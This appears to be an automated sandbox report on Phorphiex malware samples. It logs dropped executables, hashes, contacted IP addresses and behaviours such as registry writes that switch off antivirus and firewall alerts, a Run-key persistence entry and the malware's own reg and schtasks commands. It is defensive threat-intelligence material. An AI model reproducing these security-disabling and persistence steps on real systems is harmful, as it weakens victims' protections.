| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{96052E01-3F0D-11ED-A20B-4279513DF160} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371121285" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{96068D91-3F0D-11ED-A20B-4279513DF160} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe
"C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dc.exe"
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:644 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1696-54-0x00000000766D1000-0x00000000766D3000-memory.dmp
\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/980-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6969c45198338d2677fd4d30c7a374a1c56d35e8e062110e4679d1f9aefa26dcmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{96068D91-3F0D-11ED-A20B-4279513DF160}.dat
| MD5 | 96c98723c7aa7f082c53406472ee60c4 |
| SHA1 | c5b8fe2a619c05caeff1f2516510b855893e4536 |
| SHA256 | 621604816aab9a1c83b17904469719af2a9f94ef23387a6e2e6c484b1af510fb |
| SHA512 | 5d7b62adb59ebcbd99583d5f7c0815a758d6e03feabd69d2bee8bd18d4dd4b0584af59117a72f3fdd2587e3c210f492cab280fc85e37acd3595fcf0b9dd757e3 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{96052E01-3F0D-11ED-A20B-4279513DF160}.dat
| MD5 | f17f992d9d6cc3f8f9605385025c427c |
| SHA1 | 9333b3bcb069a9ccb5c87c7d126839e86fa76fe4 |
| SHA256 | 7a11c4676706939b35c1d2daf042ab2fd9189641ce4a0f4e6dc7f06005dddea7 |
| SHA512 | 8844007510cbc5182a5162ef9bc2c137265f878cc820fd6583af3099ec5e2cfeb4e0753f9910a7fd9b22792200afd7479e5e32e41ca4e5260f9c244c45d2c19a |
memory/1696-62-0x00000000000F0000-0x000000000014D000-memory.dmp
memory/1696-63-0x00000000000F0000-0x000000000014D000-memory.dmp
memory/980-64-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1696-61-0x0000000000340000-0x0000000000361000-memory.dmp
memory/980-65-0x0000000000400000-0x000000000045D000-memory.dmp
memory/1696-66-0x00000000000F0000-0x000000000014D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\T0NUVL6M.txt
| MD5 | db3eae449bd214077434096b2775e3af |
| SHA1 | 17ddd62a034415a9d8d2ad77dc665aaafa04191b |
| SHA256 | 9576274ea60d5472a94e8b46d47250480bc358fdf346c5c541bb779b42ee2aa5 |
| SHA512 | 4cca37cecfc9146078e54ed2cd54979e57d6f2ebecacc0209f6208981b8ce568530e88abbbb7e058c7d66b55e3309c04042603ac7d854f49862559b6d22e58f9 |
Analysis: behavioral9
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1656221913.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\207527470.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
| N/A | N/A | C:\Windows\sysfgdrvs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysfgdrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysfgdrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysfgdrvs.exe" | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
| File opened for modification | C:\Windows\sysfgdrvs.exe | C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1656221913.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1656221913.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe
"C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe"
C:\Windows\sysfgdrvs.exe
C:\Windows\sysfgdrvs.exe
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\207527470.exe
C:\Users\Admin\AppData\Local\Temp\207527470.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| AZ | 94.20.233.197:40500 | tcp | |
| IR | 188.253.71.202:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| PK | 116.71.51.244:40500 | udp | |
| PK | 116.71.35.250:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| UZ | 217.30.170.108:40500 | udp | |
| AF | 149.54.17.41:40500 | udp | |
| UZ | 89.236.234.110:40500 | tcp | |
| IN | 117.212.117.142:40500 | udp | |
| IR | 95.38.204.182:40500 | udp | |
| UZ | 87.237.237.23:40500 | udp | |
| UZ | 195.158.22.4:40500 | udp | |
| RU | 46.0.146.193:40500 | udp | |
| IR | 151.235.44.63:40500 | udp | |
| UZ | 213.230.109.202:40500 | tcp | |
| VE | 201.211.11.217:40500 | udp | |
| IR | 5.238.157.152:40500 | udp | |
| SY | 82.137.239.71:40500 | udp | |
| YE | 134.35.144.6:40500 | udp | |
| IN | 59.97.183.62:40500 | tcp | |
| RU | 84.51.223.35:40500 | udp | |
| IR | 78.38.31.221:40500 | udp | |
| UZ | 213.230.90.43:40500 | udp | |
| IN | 61.0.45.124:40500 | udp | |
| US | 69.67.151.86:40500 | udp | |
| N/A | 10.154.110.250:40500 | tcp | |
| IR | 213.207.220.39:40500 | udp | |
| YE | 46.35.85.37:40500 | udp | |
| IR | 31.59.67.27:40500 | udp | |
| MX | 187.135.208.172:40500 | udp |
Files
memory/948-54-0x0000000074AB1000-0x0000000074AB3000-memory.dmp
memory/1488-55-0x0000000000000000-mapping.dmp
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
\Users\Admin\AppData\Local\Temp\1656221913.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1540-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1540-63-0x000000013F870000-0x000000013F876000-memory.dmp
memory/1540-64-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmp
memory/1152-65-0x0000000000000000-mapping.dmp
memory/1316-66-0x0000000000000000-mapping.dmp
memory/1700-67-0x0000000000000000-mapping.dmp
memory/1752-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\207527470.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\207527470.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/760-70-0x0000000000000000-mapping.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
151s
Max time network
101s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\34748149.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\222168598.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
